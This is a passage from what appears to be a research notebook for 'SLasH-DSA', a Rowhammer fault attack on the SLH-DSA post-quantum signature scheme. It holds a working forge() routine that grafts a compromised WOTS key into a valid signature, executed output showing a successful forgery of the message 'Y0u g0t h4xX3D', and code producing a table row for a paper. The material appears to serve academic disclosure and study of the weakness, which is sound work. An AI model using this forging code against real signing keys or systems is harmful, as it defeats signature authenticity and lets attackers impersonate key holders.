def forge(valid_sig: bytes, sk_grafted: bytes, pk: bytes, ctx: bytes, target_adrs: ADRS, key: WOTSKeyData, m: bytes, params: str):
    pk_seed = pk[:slh.n]
    pk_root = pk[slh.n:]
    target_layer = target_adrs.get_layer_address()
    forged_sig = None
    # find a randomization value R that matches the adrs of the exposed key
    addrnd = None
    key_pair_address = target_adrs.get_key_pair_address()
    tree_adrs = target_adrs.get_tree_address()
    print(f"Searching for random seed to match tree address 0x{tree_adrs:x} and key pair address 0x{key_pair_address:02x}. This might take a while...")
    #mp = slh.to_byte(0, 1) + slh.to_byte(len(ctx), 1) + ctx + m
    
    # idx, n, m, ctx, sk_grafted, adrs, pk_seed, pk_root, params = args
    num_procs = cpu_count()
    max_repeat = 2**30
    work = [(idx, max_repeat, m, ctx, target_adrs.copy(), pk_seed, pk_root, params) for idx in range(num_procs)]
    addrnd, r, sk_prf = parallel_take_first(clib.forge_worker, work)
    if not addrnd:
        return None
    print(f"Found random seed matching grafted tree:", addrnd.hex())
    
    print("Forging signature...")
    
    # start "regular" SLH-DSA signing procedure up to the target layer using a random key and the correct PK
    print("Generating bottom part")
    
    rng = random.Random(target_adrs.a)
    rnd_sk = rng.randbytes(slh.n) + sk_prf + pk_seed + pk_root
    bottom_part, root, ht_adrs, i_leaf = slh.slh_sign(m, ctx, rnd_sk, addrnd, r, stop_at=target_layer)
    bottom_len = n + fors_bytes + target_layer * (wots_bytes + xmss_bytes)
    assert len(bottom_part) == bottom_len, f'{len(bottom_part)} != {bottom_len}'
    ht_adrs.set_tree_height(0)
    assert ht_adrs == target_adrs, f"\n{pretty_adrs(ht_adrs, verbose=True)} != \n{pretty_adrs(target_adrs)}"
    
    # sign the root of the bottom part using the grafted key
    print("Signing bottom part using grafted tree")
    t_adrs = target_adrs.copy()  # copy of target_adrs for verification
    sig_xmss = slh.xmss_sign(root, sk_grafted, i_leaf, pk_seed, target_adrs)
    forged_sig = sig_xmss
    assert xmss_pk == slh.xmss_pk_from_sig(i_leaf, sig_xmss, root, pk_seed, t_adrs)
    
    print("Signing forged signature using compromised key")
    vfy_key_adrs = target_adrs.copy()
    vfy_key_adrs.set_type_and_clear(ADRS.WOTS_PK)
    vfy_key_adrs.set_key_pair_address(target_adrs.get_key_pair_address()>>((1<<slh.hp)-1))
    vfy_key_adrs.set_tree_address(target_adrs.get_tree_address()>>slh.hp)
    
#    assert key.adrs == vfy_key_adrs, f'\n{pretty_adrs(key.adrs, verbose=True)} != \n{pretty_adrs(vfy_key_adrs)}'    
    wots_sig = key.try_sign(xmss_pk, pk_seed, params)
    forged_sig += wots_sig
    
    pkadr = key.adrs.copy()
    pkadr.set_type_and_clear(ADRS.WOTS_HASH)
    pkadr.set_key_pair_address(key.adrs.get_key_pair_address())
    assert key.pk == slh.wots_pk_from_sig(wots_sig, xmss_pk, pk_seed, pkadr)
    # take top part from valid signature
    forged_len = wots_bytes + xmss_bytes + wots_bytes
    top_part = valid_sig[bottom_len + forged_len:]
    assert len(bottom_part) + len(forged_sig) + len(top_part) == sig_len
    full_sig = bottom_part + forged_sig + top_part
    return full_sig

In [None]:
attack_time = None
if xmss_adrs:
    print(f'Path seeking complexity for layer {xmss_adrs.get_layer_address()}: 2^{math.log2(seeking_complexity)}')
    if seeking_complexity >= 2**30:
        print('Path seeking complexity too large, skipping forgery.')
    else:
        forged_m = b'Y0u g0t h4xX3D'
        print(f'Signining message "{forged_m.decode()}" with compromised key')
        # print(f"Expected path seeking complexity: 2^{math.log2(seeking_complexity)}")
        ctx = b'This is a demonstration of SLasH-DSA, a Rowhammer attack against SLH-DSA.'
        sig = forge(valid_sig, sk_grafted, pk, ctx, xmss_adrs.copy(), key, forged_m, params)
        #print('Done signing forged message')
        #print(f'searching for XMSS PK {slh.search_root} and WOTS PK {slh.search_wots_pk} while verifying')
        attack_time = timer() - full_attack_start
        # Verify forged signature
        assert slh.slh_verify(forged_m, sig, ctx, pk, params)
attack_time

Path seeking complexity for layer 18: 2^9.0
Signining message "Y0u g0t h4xX3D" with compromised key
Searching for random seed to match tree address 0x1e5 and key pair address 0x00. This might take a while...


Returned from the future with result: (b"\xc9'!\xfb\x08\xcej\x06\xd4A\xca\xf3\xf1\x82\xdai", b'[\xe9fn*f.\x13\x1c\xcc!\x12GNu\xcd', b'E|v\x9f9\xd8dA\x99\xc0\xe5\xbd\xbc\xfb\xc8[')
Found random seed matching grafted tree: c92721fb08ce6a06d441caf3f182da69
Forging signature...
Generating bottom part
Signing bottom part using grafted tree
Signing forged signature using compromised key


292.12088378705084

# Numbers for paper
...appear here

In [None]:
from multiprocessing import Pool, cpu_count
from functools import partial
from cryptanalysis_worker import check_fault

# Use all available cores
num_procs = cpu_count()
unique_sigs = list(set(sigs))

frac_fault = 0
if True:
    with Pool(processes=num_procs) as pool:
        # Create a partial function with fixed arguments
        worker = partial(check_fault, slh=slh, sk=sk, params=params)
        
        # Map the worker function to the signatures
        results = pool.map(worker, unique_sigs)

    num_faulted = sum(results)
    frac_fault = num_faulted / len(sigs) if sigs else 0

if best:
    adrs, key, grafting_complexity, seeking_complexity = best
    print(f'& {security} & ${len(sigs)}$ & {num_faulted} & ${key.adrs.get_layer_address()}$ & $2^{{{math.log2(grafting_complexity):.02f}}}$ & $2^{{{math.log2(seeking_complexity):.00f}}}$ & {str(f'${attack_time:.0f}$') if attack_time else '--'} \\\\')
else:
    print(f'& {security} & ${len(sigs)}$ & {num_faulted} & -- & -- & -- & -- \\\\')

& 128f & $52$ & 6 & $19$ & $2^{31.70}$ & $2^{9}$ & $292$ \\
